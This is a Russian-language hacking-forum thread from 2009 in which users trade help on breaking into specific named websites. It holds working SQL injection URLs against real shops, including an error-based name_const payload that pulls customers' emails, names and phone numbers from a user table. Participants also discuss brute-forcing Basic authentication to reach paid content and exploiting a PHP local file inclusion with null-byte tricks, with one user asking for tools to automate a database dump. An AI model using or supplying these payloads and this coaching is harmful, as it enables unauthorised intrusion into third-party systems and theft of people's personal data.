Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. skyscr

    skyscr New Member

    Joined:
    2 Jun 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    ребя подскажите инфу про сайтик:
    http://lenagames.com/astra/jigsaws/

    сайт вроде допотопный, вылазит форма авторизации, пробовал скачать сайт и полазить внутри, ничего интересного кроме java скриптов не нашёл, а папка jigsaws без авторизации никак.

    В той папке лежат платные картинки для пазлов :)
    Есть прога игра с пазлами, которая региться, а потом отсылает данные по вышеизложенному адресу, а в ответ мне приходит, что-то типа неправильный ключ,
    нашёл и поставил ломанную прогу предыдущей версии этих пазлов и посмотрел как она лезет на сайт через Http Analyzer:
    "bj601_download" - как я понял это логин
    пароль ломанный состоял из 24 символов (символы от A до F и от 0 до 9)

    возможен ли метод перебора по моим параметрам или есть способы попроще?
     
    #9241 skyscr, 12 Oct 2009
    Last edited: 12 Oct 2009
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Вот эта папка (в которой платные картинки) стоит по Basic-авторизацией.
     
  3. skyscr

    skyscr New Member

    Joined:
    2 Jun 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    предлагаете брутить?
     
  4. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Да. Либо еще можно найти уязвимость и прочитать .htpasswd, но я думаю, что там их нету, т.к. сайт на HTML...
     
  5. skyscr

    skyscr New Member

    Joined:
    2 Jun 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    мдя, словарик больше Tb будет, брут не получится
     
  6. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    А как можно вывести рабочие столбцы вот тут?
    Code:
    http://www.sonyshop.kiev.ua/index.php?t=item_det&id=1361 union select 1,2,3 --
    стандартное добаление '-' и изминение значения страницы приводит к ридиректу на страницу 404
     
  7. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    нету полей для вывода...
    Code:
    http://www.sonyshop.kiev.ua/index.php?t=item_det&id=1361+and+1=0+union+select+1,2,3+--+-
    пробуй как слепую покрутить....
     
  8. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    ха, пробовал, не видно)

    А вот ещё вопросик. В скуле
    Code:
    http://trade.polesye.net/catalog.php?catid=2&id=176%20union%20select%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15/*
    Выводит вот такое
    Code:
    Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION' 
    так как первый раз такое вижу, вопрос, что это и как с ним бороться?
     
  9. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Code:
    http://trade.polesye.net/catalog.php?catid=2&id=176%20union%20select%201,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14,15/*
    Одни и те же вопросы.....
     
    1 person likes this.
  10. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Спасибо но....
    Access denied for user 'trader'@'localhost' to database 'INFORMATION_SCHEMA'
     
    #9250 TELO, 13 Oct 2009
    Last edited: 13 Oct 2009
  11. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Головой умеешь думать?
    Так то тебе дали рабочий пример.
    Т.к. нету запроса к INFORMATION_SCHEMA.
    Так что запрос который ты послал сейчас, уже твои проблемы.
    Ибо вообще нету прав к INFORMATION_SCHEMA.
     
  12. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    В 5й ветке можешь узнать имена столбцов в таблице (если знаешь имя таблицы): https://forum.antichat.ru/showpost.php?p=1494440&postcount=10
     
    3 people like this.
  13. Glazz

    Glazz Elder - Старейшина

    Joined:
    9 Aug 2008
    Messages:
    116
    Likes Received:
    7
    Reputations:
    0
    Имеется следующий код на пхп:
    PHP:
    if(is_file("modules/rankings/$_POST[sort].php")){include("modules/rankings/$_POST[sort].php");}
    Можно ли , изменяя $_POST[sort], добиться удаленного инклуда или же инклуда локальных файлов без .php?
    Ну попробую добавить нулевой байт и проверить.
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    удаленного нет, LFI - да.
     
  15. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Почему бы и нет?
    Просто is_file() проверяет, существует файл или нет.
    Если существует > загружает.
    Несуществует > Незнаю, кода дальше нету.

    Удалённого несможешь.
     
  16. Glazz

    Glazz Elder - Старейшина

    Joined:
    9 Aug 2008
    Messages:
    116
    Likes Received:
    7
    Reputations:
    0
    Как я понимаю, is_file(); не позволит инклудить удаленный файл, а вот с локальным что-то не могу разобраться. Если добавляю в конец %00, то он что-то конец не отбрасывает.
     
  17. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    И откуда ты раздобыл такую увлекательную задачку..
     
    1 person likes this.
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Как вы изволили выразится "конец отбросит" если
    magic_quotes_gpc = Off

    А удалённо не получится т.к. путь никуда не деть
     
    2 people like this.
  19. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Как сделать дамб БД при таком раскладе
    Code:
    http://www.steroids-pharma.com/product_search.php?query=mk%%27+and+(select+*+from+(select+*+from+(select+name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1),name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1))a)b)
    Пробовал через concat_ws and group_concat ничего неполучилось,может есть прога или скрипт который автоматически будет добавлять лимит и записывать данные в файл(проги конечно есть такие,но с такой скулей наврялти запашет).
     
  20. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    is_file() лишь проверка на существование файла.
    А как уже написал jokester, директорию некуда не денешь.
    Возможен фильтр на %00 ,%0D пробуй, %0A.
     
Thread Status:
Not open for further replies.